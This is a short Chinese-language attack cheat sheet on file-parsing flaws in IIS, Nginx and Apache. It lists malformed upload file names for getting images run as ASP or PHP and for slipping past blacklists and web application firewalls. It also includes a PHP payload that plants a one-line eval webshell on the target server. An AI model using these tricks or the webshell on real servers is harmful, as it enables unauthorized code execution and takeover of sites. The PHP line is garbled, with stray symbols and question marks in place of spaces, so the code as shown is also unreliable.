0x00 IIS5.x/6.0解析漏洞
1.目录解析(在asp文件后缀的文件可以以asp的格式被解析)
/xx.asp/xx.jpg
2.文件解析(以前可以绕狗和策略)
test.asp;.jpg
0x01 IIS7.0/IIS7.5/Nginx<8.03畸形解析漏洞
Nginx解析漏洞是由我国安全组织80sec发现
在默认Fast-CGI开启状况下,上传一个test.jpg,内容为
<?PHP fputs(fopen('shell.php','w')>,'<?php?eval($_POST[cmd]?>');?>
直接访问test.jpg/.php,则会在这个目录下生成一个一句话木马shell.php
0x02 Nginx<8.03?空字节代码执行漏洞
影响:0.5. 0.6. ?0.7?<=?0.7.65 ?0.8?<=?0.8.37
Nginx在图片中嵌入PHP代码然后通过访问
test,jpg%00.php
0x03 Apache解析漏洞
Apache是从右往左进行解析,如果不能解析,就往前跳,再进行识别解析。
那么可以写 test,php.owf.rar 后面两个后缀名,apache是无法识别的,所以最终跳到前面的php后缀进行解析。
判断是不是合法的后缀,就只能一个个进行尝试看看是否能成功。
0x04 其他
在windows环境,test.jpg[空格]或者test.jpg. 这两类都是不被允许的,windows会自动消除多余的空格或者点绕过黑名单。
以及上一章节的,htaccess文件也可以视作一个解析,不多赘述。